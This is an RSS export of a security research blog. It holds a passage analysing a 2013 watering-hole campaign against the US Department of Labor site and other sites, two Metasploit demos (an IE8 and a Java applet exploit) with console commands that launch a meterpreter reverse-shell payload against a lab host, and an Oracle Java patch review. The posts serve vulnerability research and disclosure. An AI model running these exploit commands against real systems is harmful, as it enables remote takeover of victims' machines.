<p style="text-align: center;"><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/SA2012-02.png"><img class="aligncenter  wp-image-6507" alt="SA2012-02" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/SA2012-02.png?resize=689%2C246" data-recalc-dims="1" /></a></p>
<p>Once all information&#8217;s gathered, the script send all data&#8217;s on a specific URL &#8220;<em>hxxp://dol[.]ns01[.]us:8081/web/js.php</em>&#8221; and also call &#8220;<em>hxxp://dol[.]ns01[.]us:8081/web/css.js</em>&#8221; when the information&#8217;s are collected.</p>
<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/infogath-inclusions.png"><img class="aligncenter size-full wp-image-6509" alt="infogath-inclusions" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/infogath-inclusions.png?resize=410%2C112" data-recalc-dims="1" /></a></p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/infogath-js.png"><img class="aligncenter size-full wp-image-6508" alt="infogath-js" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/infogath-js.png?resize=858%2C302" data-recalc-dims="1" /></a></p>
<p>An interesting information regarding &#8220;<em>/web/css.js</em>&#8220;, is that the &#8220;<em>Last Modified</em>&#8221; date reported by &#8220;<em>dol[.]ns01[.]us</em>&#8221; server is Thu, 14 Mar 2013 20:06:36 GMT. This is reporting that the information gathering infrastructure was in place since mid-March minimum.</p>
<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/dol.ns01.us-8081-1.png"><img class="aligncenter size-medium wp-image-6510" alt="dol.ns01.us-8081-1" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/dol.ns01.us-8081-1.png?resize=300%2C54" data-recalc-dims="1" /></a></p>
<p>Interesting facts regarding these information gathering scripts are:</p>
<ul>
<li>Scripts &#8220;<em>xss.php</em>&#8220;, &#8220;<em>js.php</em>&#8221; &amp; &#8220;<em>css.js</em>&#8221; have move from IP 96[.]44[.]136[.]115 on port 80/TCP to domain dol[.]ns01[.]us port 8081/TCP. Move from port 80/TCP to 8081/TCP doesn&#8217;t seem to be logic, most of time outgoing connexion&#8217;s authorized on Firewalls, for corporate Web surfing, are 80/TCP and 443/TCP.</li>
<li>Different types of information gathering scripts were in place, and all users who have visit DOL website were affected by this information gathering campaign.</li>
<li>Usage of a specific information leakage vulnerability present in Internet Explorer 8 and not fixed by Microsoft.</li>
<li>BitDefender 2012 deactivation attempt is confusing. Why trying to deactivate an anti-virus, this will surely generate an alert.</li>
</ul>
<h5>Information Gathered on dol[.]ns01[.]us</h5>
<p>As described in the previous chapter, the information gathering code send a lot of information&#8217;s to the backend. Hopefully for security researchers, the backend wasn&#8217;t very well protected and all collected information&#8217;s were accessible without any restrictions in different web folders. You can find here under some statistics related to the gathered information&#8217;s.</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/TOP-10-TARGETED-COUNTRIES.png"><img class="aligncenter size-full wp-image-6512" alt="TOP-10-TARGETED-COUNTRIES" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/TOP-10-TARGETED-COUNTRIES.png?resize=450%2C320" data-recalc-dims="1" /></a></p>
<p>Complete geolocation of the targeted source IPs</p>
<p style="text-align: center;"><a href="https://www.google.com/fusiontables/embedviz?viz=MAP&amp;q=select+col5+from+1kEak6llYt6vtF1Fh6rQIKfLk4TSH6v4UrFSYjcI&amp;h=false&amp;lat=22.527830974761137&amp;lng=15.237094299999967&amp;z=2&amp;t=1&amp;l=col5&amp;y=2&amp;tmplt=2"><img class="aligncenter size-full wp-image-6513" alt="GEO-LOCALISATION" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/GEO-LOCALISATION.png?resize=812%2C334" data-recalc-dims="1" /></a></p>
<p style="text-align: left;">By analyzing the information&#8217;s sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn&#8217;t the only compromised website:</p>
<ul>
<li><strong>From 2013-03-15 to 2013-04-29 : University Research Co. Cambodia</strong> website (<em>www.urccambodia.org</em>) was the first target .This explain the high number of distinct IP addresses from Cambodia.</li>
<li><strong>From 2013-04-08 to 2013-04-24 : Awards for Excellence in Education</strong> website (<em>www.forexcellenceineducation.org</em>), a program of Fraser Institute, was the second target.</li>
<li><strong>From 2013-04-08 to 2013-04-24 : ElectionGuide</strong> website (<em>www.electionguide.org</em>), provided by the International Foundation for Electoral Systems (IFES), was the third target.</li>
<li><strong>From 2013-04-09 to 2013-04-30 : French Institute of International Relations</strong> website (<em>www.ifri.org</em>), was the fourth target.</li>
<li><strong>From 2013-04-09 to 2013-04-24 : The Working for America Institute</strong> website (<em>www.workingforamerica.org</em>), was the fifth target.</li>
<li><strong>From 2013-04-09 to 2013-04-10 : The Project 2049 Institute</strong> website (<em>www.project2049.net</em>), was the sixth target.</li>
<li><strong>From 2013-04-10 to 2013-04-10 : The Union Label and Service Trades Department</strong> website (<em>www.unionlabel.org</em>), was the seventh target.</li>
<li><strong>From 2013-04-11 to 2013-04-30 : Thales Catalogue</strong> website (<em>components-subsystems.thales-catalogue.com</em>), was the eighth target.</li>
<li><strong>From 2013-04-23 to 2013-05-01 : United States Department of Labor (DOL) Site Exposure Matrices (SEM)</strong> website (<em>www.sem.dol.gov</em>), was the ninth target.</li>
</ul>
<p>Here under the hits by browsers and Internet Explorer 8 hits by OS.</p>
<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/Hits-by-Browsers.png"><img class="aligncenter size-full wp-image-6516" alt="Hits-by-Browsers" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/Hits-by-Browsers.png?resize=450%2C320" data-recalc-dims="1" /></a></p>
<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/IE8-Hits-os2.png"><img class="aligncenter size-full wp-image-6518" alt="IE8-Hits-os2" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/IE8-Hits-os2.png?resize=450%2C320" data-recalc-dims="1" /></a></p>
<h5>Others Information&#8217;s Gathered</h5>
<p>As you have read in the previous chapter, <strong>ElectionGuide</strong> website (<em>www.electionguide.org</em>) was also targeted during this watering hole campaign. As you can see in the following <strong>urlQuery</strong> submission, dating from <a href="http://urlquery.net/report.php?id=2257232" target="_blank"><strong>2013-05-01</strong></a>, 96[.]44[.]136[.]115 is also present but don&#8217;t respond any more. Also if you observe the urlQuery submission of <strong><a href="http://urlquery.net/report.php?id=2310729" target="_blank">2013-05-03</a>, </strong>96[.]44[.]136[.]115 is still present, but a new backend server has been setup in order replace the once deactivated.</p>
<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/electionguide-both.gif"><img class="aligncenter size-full wp-image-6519" alt="electionguide-both" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/electionguide-both.gif?resize=424%2C165" data-recalc-dims="1" /></a></p>
<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/electionguide-info-gath-inclusions.png"><img class="aligncenter size-full wp-image-6520" alt="electionguide-info-gath-inclusions" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/electionguide-info-gath-inclusions.png?resize=423%2C64" data-recalc-dims="1" /></a></p>
<p>If you observe the &#8220;Last Modified&#8221; date of &#8220;<em>css.js</em>&#8221; file, the installation date of these files is at least the 2013-05-03.</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/electionguide-css.png"><img class="aligncenter size-medium wp-image-6521" alt="electionguide-css" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/electionguide-css.png?resize=300%2C54" data-recalc-dims="1" /></a></p>
<p>Also, by researching some patterns matching the information&#8217;s gathering script on Google you can find some previous unknown campaigns, that were using the same code.</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/56go-google.png"><img class="aligncenter size-full wp-image-6522" alt="56go-google" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/56go-google.png?resize=484%2C94" data-recalc-dims="1" /></a></p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/56go-google-cache.png"><img class="aligncenter size-medium wp-image-6523" alt="56go-google-cache" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/56go-google-cache.png?resize=300%2C57" data-recalc-dims="1" /></a></p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6527" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/" class="wp_rp_title">DOL Watering Hole Campaign and Sexy Swedish Soccer Supporter</a></li><li data-position="1" data-poid="in-6487" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/" class="wp_rp_title">CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo</a></li><li data-position="2" data-poid="in-5960" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/" class="wp_rp_title">Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More</a></li><li data-position="3" data-poid="in-5953" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/" class="wp_rp_title">Microsoft Internet Explorer CButton Vulnerability Metasploit Demo</a></li><li data-position="4" data-poid="in-5941" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/30/microsoft-release-security-advisory-msa-2794220-for-cfe-internet-explorer-0day/" class="wp_rp_title">Microsoft Release Security Advisory MSA-2794220 for CFE Internet Explorer 0day</a></li><li data-position="5" data-poid="in-5915" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/" class="wp_rp_title">Attack and IE 0day Informations Used Against Council on Foreign Relations</a></li><li data-position="6" data-poid="in-6082" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/15/watering-hole-campaign-use-latest-java-and-ie-vulnerabilities/" class="wp_rp_title">Watering Hole Campaign Use Latest Java and IE Vulnerabilities</a></li><li data-position="7" data-poid="in-6070" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/14/microsoft-out-of-band-patch-for-internet-explorer-cve-2012-4792-vulnerability/" class="wp_rp_title">Microsoft Out-Of-Band Patch for Internet Explorer CVE-2012-4792 Vulnerability</a></li><li data-position="8" data-poid="in-5974" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/03/chinese-uygur-minority-also-targeted-in-the-cfr-watering-hole-attack-and-more/" class="wp_rp_title">Chinese Uygur Minority Also Targeted in the CFR Watering Hole Attack And More</a></li><li data-position="9" data-poid="in-6080" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/14/ms13-008-patch-internet-explorer-cve-2012-4792-0day-vulnerability/" class="wp_rp_title">MS13-008 Patch Internet Explorer CVE-2012-4792 0day Vulnerability</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/feed/</wfw:commentRss>
		<slash:comments>25</slash:comments>
		</item>
		<item>
		<title>CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo</title>
		<link>http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/</link>
		<comments>http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/#comments</comments>
		<pubDate>Sun, 05 May 2013 20:23:29 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[CVE-2013-1347]]></category>
		<category><![CDATA[DOL]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Internet Explorer 0day]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MSA-2847140]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6487</guid>
		<description><![CDATA[Timeline :
Watering hole campaign first reported on a private mailing list the 2013-04-30
Watering hole campaign publicly disclosed by AlienVault and Invincea the 2013-04-30
0day exploit spotted by FireEye the 2013-05-03
Microsoft Security Advisory posted the 2013-05-03
Metasploit PoC provided the  [...]]]></description>
				<content:encoded><![CDATA[<h4>Timeline :</h4>
<p>Watering hole campaign first reported on a private mailing list the 2013-04-30<br />
Watering hole campaign publicly disclosed by AlienVault and Invincea the 2013-04-30<br />
0day exploit spotted by FireEye the 2013-05-03<br />
Microsoft Security Advisory posted the 2013-05-03<br />
Metasploit PoC provided the 2013-05-05</p>
<h4><strong>PoC provided by :</strong></h4>
<p>Unknown<br />
EMH<br />
juan vazquez<br />
sinn3r</p>
<h4><strong>Reference(s) :</strong></h4>
<p><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347" target="_blank">CVE-2013-1347</a><br />
<a href="http://osvdb.org/show/osvdb/92993" target="_blank">OSVDB-92993</a><br />
<a href="http://technet.microsoft.com/en-us/security/advisory/2847140" target="_blank">MSA-2847140</a></p>
<h4><strong>Affected version(s) :</strong></h4>
<p>Internet Explorer 8</p>
<h4><strong>Tested on Windows XP Pro SP3 </strong>with :</h4>
<p>Internet Explorer 8</p>
<h4><strong>Description :</strong></h4>
<p>This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that&#8217;s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) web site.</p>
<h4><strong>Commands :</strong></h4>
<pre>use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo</pre>
<p><iframe width="560" height="315" src="http://www.youtube.com/embed/3owJO9b76i0" frameborder="0" allowfullscreen=""></iframe></p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6489" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/" class="wp_rp_title">Department of Labor Watering Hole Campaign Review</a></li><li data-position="1" data-poid="in-6527" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/" class="wp_rp_title">DOL Watering Hole Campaign and Sexy Swedish Soccer Supporter</a></li><li data-position="2" data-poid="in-6547" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/14/microsoft-may-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft May 2013 Patch Tuesday Review</a></li><li data-position="3" data-poid="in-5953" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/" class="wp_rp_title">Microsoft Internet Explorer CButton Vulnerability Metasploit Demo</a></li><li data-position="4" data-poid="in-6070" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/14/microsoft-out-of-band-patch-for-internet-explorer-cve-2012-4792-vulnerability/" class="wp_rp_title">Microsoft Out-Of-Band Patch for Internet Explorer CVE-2012-4792 Vulnerability</a></li><li data-position="5" data-poid="in-5941" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/30/microsoft-release-security-advisory-msa-2794220-for-cfe-internet-explorer-0day/" class="wp_rp_title">Microsoft Release Security Advisory MSA-2794220 for CFE Internet Explorer 0day</a></li><li data-position="6" data-poid="in-1713" data-post-type="none" ><a href="http://eromang.zataz.com/2011/03/09/edb-id-16940-microsoft-net-runtime-optimization-service-privilege-escalation/" class="wp_rp_title">EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation</a></li><li data-position="7" data-poid="in-5915" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/" class="wp_rp_title">Attack and IE 0day Informations Used Against Council on Foreign Relations</a></li><li data-position="8" data-poid="in-5960" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/" class="wp_rp_title">Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More</a></li><li data-position="9" data-poid="in-6082" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/15/watering-hole-campaign-use-latest-java-and-ie-vulnerabilities/" class="wp_rp_title">Watering Hole Campaign Use Latest Java and IE Vulnerabilities</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/feed/</wfw:commentRss>
		<slash:comments>31</slash:comments>
		</item>
		<item>
		<title>CVE-2013-2423 &#8211; Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo</title>
		<link>http://eromang.zataz.com/2013/04/20/java-7u17-applet-reflection-type-confusion-rce-metasploit-demo/</link>
		<comments>http://eromang.zataz.com/2013/04/20/java-7u17-applet-reflection-type-confusion-rce-metasploit-demo/#comments</comments>
		<pubDate>Sat, 20 Apr 2013 10:45:23 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[CVE-2013-2423]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Java 7 Update 17]]></category>
		<category><![CDATA[Java SE 7]]></category>
		<category><![CDATA[Oracle]]></category>
		<category><![CDATA[Oracle Java Critical Patch Update April 2013]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6478</guid>
		<description><![CDATA[Timeline :
Vulnerability discovered and reported to vendor by Jeroen Frijters
Vulnerability corrected in April CPU the 2013-04-16
Vulnerability publicly disclosed by Jeroen Frijters the 2013-04-17
Metasploit PoC provided the 2013-04-20
PoC provided by :
Jeroen Frijters
juan vazquez
Reference(s)  [...]]]></description>
				<content:encoded><![CDATA[<h4>Timeline :</h4>
<p>Vulnerability discovered and reported to vendor by Jeroen Frijters<br />
Vulnerability corrected in April CPU the 2013-04-16<br />
Vulnerability publicly disclosed by Jeroen Frijters the 2013-04-17<br />
Metasploit PoC provided the 2013-04-20</p>
<h4><strong>PoC provided by :</strong></h4>
<p><a href="http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0" target="_blank">Jeroen Frijters</a><br />
juan vazquez</p>
<h4><strong>Reference(s) :</strong></h4>
<p><a title="Oracle Java Critical Patch Update April 2013 Review" href="http://eromang.zataz.com/2013/04/16/oracle-java-critical-patch-update-april-2013-review/" target="_blank">Oracle Java April 2013 CPU</a><br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2423" target="_blank">CVE-2013-2423</a><br />
<a href="http://osvdb.org/show/osvdb/92348" target="_blank">OSVDB-92348</a><br />
<a href="http://www.securityfocus.com/bid/59162" target="_blank">BID-59162</a></p>
<h4><strong>Affected version(s) :</strong></h4>
<p>JDK and JRE 7 Update 17 and earlier</p>
<h4><strong>Tested on Windows XP Pro SP3 </strong>with :</h4>
<p>JDK and JRE 7 Update 17</p>
<h4><strong>Description :</strong></h4>
<p>This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn&#8217;t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.</p>
<h4><strong>Commands :</strong></h4>
<pre>use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo</pre>
<p><iframe width="560" height="315" src="http://www.youtube.com/embed/RVElc3obEcE" frameborder="0" allowfullscreen=""></iframe></p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-5850" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/18/bye-bye-java-se-6-security-enhancements-in-java-se-7u10/" class="wp_rp_title">Bye Bye Java SE 6, Security Enhancements in Java SE 7U10</a></li><li data-position="1" data-poid="in-6471" data-post-type="none" ><a href="http://eromang.zataz.com/2013/04/16/oracle-java-critical-patch-update-april-2013-review/" class="wp_rp_title">Oracle Java Critical Patch Update April 2013 Review</a></li><li data-position="2" data-poid="in-6125" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/23/cve-2012-5088-java-applet-method-handle-rce-metasploit-demo/" class="wp_rp_title">CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo</a></li><li data-position="3" data-poid="in-6123" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/23/cve-2012-5076-java-applet-averagerangestatisticimpl-rce-metasploit-demo/" class="wp_rp_title">CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo</a></li><li data-position="4" data-poid="in-6307" data-post-type="none" ><a href="http://eromang.zataz.com/2013/03/04/oracle-update-to-java-7-update-17-and-to-java-6-update-43-but/" class="wp_rp_title">Oracle update to Java 7 Update 17 and to Java 6 Update 43, but&#8230;</a></li><li data-position="5" data-poid="in-3648" data-post-type="none" ><a href="http://eromang.zataz.com/2012/03/31/cve-2012-0507-java-atomicreferencearray-type-violation-vulnerability-metasploit-demo/" class="wp_rp_title">CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo</a></li><li data-position="6" data-poid="in-6278" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/25/cve-2013-0431-java-applet-jmx-remote-code-execution-metasploit-demo/" class="wp_rp_title">CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo</a></li><li data-position="7" data-poid="in-6140" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/03/oracle-java-critical-patch-update-february-2013-review/" class="wp_rp_title">Oracle Java Critical Patch Update February 2013 Review</a></li><li data-position="8" data-poid="in-6256" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/20/oracle-java-critical-patch-update-february-2013-special-update-review/" class="wp_rp_title">Oracle Java Critical Patch Update February 2013 &#8211; Special Update Review</a></li><li data-position="9" data-poid="in-3250" data-post-type="none" ><a href="http://eromang.zataz.com/2012/02/23/cve-2012-0500-oracle-java-web-start-plugin-command-line-argument-injection-metasploit-demo/" class="wp_rp_title">CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/04/20/java-7u17-applet-reflection-type-confusion-rce-metasploit-demo/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>Oracle Java Critical Patch Update April 2013 Review</title>
		<link>http://eromang.zataz.com/2013/04/16/oracle-java-critical-patch-update-april-2013-review/</link>
		<comments>http://eromang.zataz.com/2013/04/16/oracle-java-critical-patch-update-april-2013-review/#comments</comments>
		<pubDate>Tue, 16 Apr 2013 21:38:06 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Vulnerability Management]]></category>
		<category><![CDATA[CVE-2013-0401]]></category>
		<category><![CDATA[CVE-2013-0402]]></category>
		<category><![CDATA[CVE-2013-1488]]></category>
		<category><![CDATA[CVE-2013-1491]]></category>
		<category><![CDATA[CVE-2013-1518]]></category>
		<category><![CDATA[CVE-2013-1537]]></category>
		<category><![CDATA[CVE-2013-1540]]></category>
		<category><![CDATA[CVE-2013-1557]]></category>
		<category><![CDATA[CVE-2013-1558]]></category>
		<category><![CDATA[CVE-2013-1561]]></category>
		<category><![CDATA[CVE-2013-1563]]></category>
		<category><![CDATA[CVE-2013-1564]]></category>
		<category><![CDATA[CVE-2013-1569]]></category>
		<category><![CDATA[CVE-2013-2383]]></category>
		<category><![CDATA[CVE-2013-2384]]></category>
		<category><![CDATA[CVE-2013-2394]]></category>
		<category><![CDATA[CVE-2013-2414]]></category>
		<category><![CDATA[CVE-2013-2415]]></category>
		<category><![CDATA[CVE-2013-2416]]></category>
		<category><![CDATA[CVE-2013-2417]]></category>
		<category><![CDATA[CVE-2013-2418]]></category>
		<category><![CDATA[CVE-2013-2419]]></category>
		<category><![CDATA[CVE-2013-2420]]></category>
		<category><![CDATA[CVE-2013-2421]]></category>
		<category><![CDATA[CVE-2013-2422]]></category>
		<category><![CDATA[CVE-2013-2423]]></category>
		<category><![CDATA[CVE-2013-2424]]></category>
		<category><![CDATA[CVE-2013-2425]]></category>
		<category><![CDATA[CVE-2013-2426]]></category>
		<category><![CDATA[CVE-2013-2427]]></category>
		<category><![CDATA[CVE-2013-2428]]></category>
		<category><![CDATA[CVE-2013-2429]]></category>
		<category><![CDATA[CVE-2013-2430]]></category>
		<category><![CDATA[CVE-2013-2431]]></category>
		<category><![CDATA[CVE-2013-2432]]></category>
		<category><![CDATA[CVE-2013-2433]]></category>
		<category><![CDATA[CVE-2013-2434]]></category>
		<category><![CDATA[CVE-2013-2435]]></category>
		<category><![CDATA[CVE-2013-2436]]></category>
		<category><![CDATA[CVE-2013-2438]]></category>
		<category><![CDATA[CVE-2013-2439]]></category>
		<category><![CDATA[CVE-2013-2440]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Java 7 Update 21]]></category>
		<category><![CDATA[Java SE 6]]></category>
		<category><![CDATA[Java SE 7]]></category>
		<category><![CDATA[Oracle]]></category>
		<category><![CDATA[Oracle Java Critical Patch Update]]></category>
		<category><![CDATA[Oracle Java Critical Patch Update April 2013]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6471</guid>
		<description><![CDATA[Oracle has provide his Java Critical Patch Update (CPU) for April 2013 who has been released on Tuesday, April 16. On the 42 security vulnerabilities fixed in this CPU, 39 of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0.
This update fix the  [...]]]></description>
				<content:encoded><![CDATA[<p><strong>Oracle</strong> has provide his <strong><a href="http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html" target="_blank">Java Critical Patch Update (CPU) for April 2013</a></strong> who has been released on Tuesday, April 16. On the 42 security vulnerabilities fixed in this CPU, 39 of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is <span style="color: #ff0000;"><strong>10.0</strong></span>.</p>
<p>This update fix the vulnerabilities exploited by James Forshaw (tyranid), Joshua J. Drake and VUPEN Security during <a href="http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Pwn2Own-2013-Recap/ba-p/5996085" target="_blank"><strong>Pwn20wn 2013</strong></a>. But this update is also fixing vulnerabilities reported by Adam Gowdiak of Security Explorations and other security researchers.</p>
<p>As you may know Oracle is using <a href="http://www.first.org/cvss/cvss-guide.html" target="_blank"><strong>CVSS 2.0</strong></a> (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security <a href="http://www.teamshatter.com/topics/general/team-shatter-exclusive/is-oracle-misleading-its-database-customers-with-cpus/" target="_blank">researchers disagree</a> with the <a href="http://www.oracle.com/technetwork/topics/security/cvssscoringsystem-091884.html" target="_blank">usage of CVSS by Oracle</a>. Oracle play with CVSS score by creating a &#8220;<em>Partial+</em>&#8221; impact rating how don&#8217;t exist in CVSS 2.0, and by interpreting the &#8220;<em>Complete</em>&#8221; rating in a different way than defined in CVSS 2.0.</p>
<p>Affected products are:</p>
<ul>
<li>JDK and JRE 7 Update 17 and earlier</li>
<li>JDK and JRE 6 Update 43 and earlier</li>
<li>JDK and JRE 5.0 Update 41 and earlier</li>
<li>JavaFX 2.2.7 and earlier</li>
</ul>
<p>Proposed updates are:</p>
<ul>
<li>JDK and JRE 7 Update 21</li>
<li>JDK and JRE 6 Update 45</li>
<li>JDK and JRE 5.0 Update 43</li>
<li>JavaFX 2.2.21</li>
</ul>
<p>19 (45,24%) of the vulnerabilities have a CVSS base score of <strong>10.0</strong>, 28 (66,67%) of the vulnerabilities have a high CVSS base score (CVSS =&gt; 7.0), 13 (30,95%) of the vulnerabilities have a medium CVSS base score (CVSS &gt;= 4.0 &lt; 7.0) and 1 (2,38%) of the vulnerabilities has a low CVSS base score (CVSS &lt; 4.0). Also 25 (59,52%) of the vulnerabilities affects Java SE 6 and 42 (100%) of the vulnerabilities are affecting Java SE 7.</p>
<p>Also some modifications have been done in the<a title="Bye Bye Java SE 6, Security Enhancements in Java SE 7U10" href="http://eromang.zataz.com/2012/12/18/bye-bye-java-se-6-security-enhancements-in-java-se-7u10/" target="_blank"><strong> Security Levels</strong></a> provided by Oracle. Previously five levels were existing (<em>Very-High, High, Medium, Low and Custom</em>), in the new provided version only three levels are still existing (<em>Very-High, High and Medium</em>).</p>
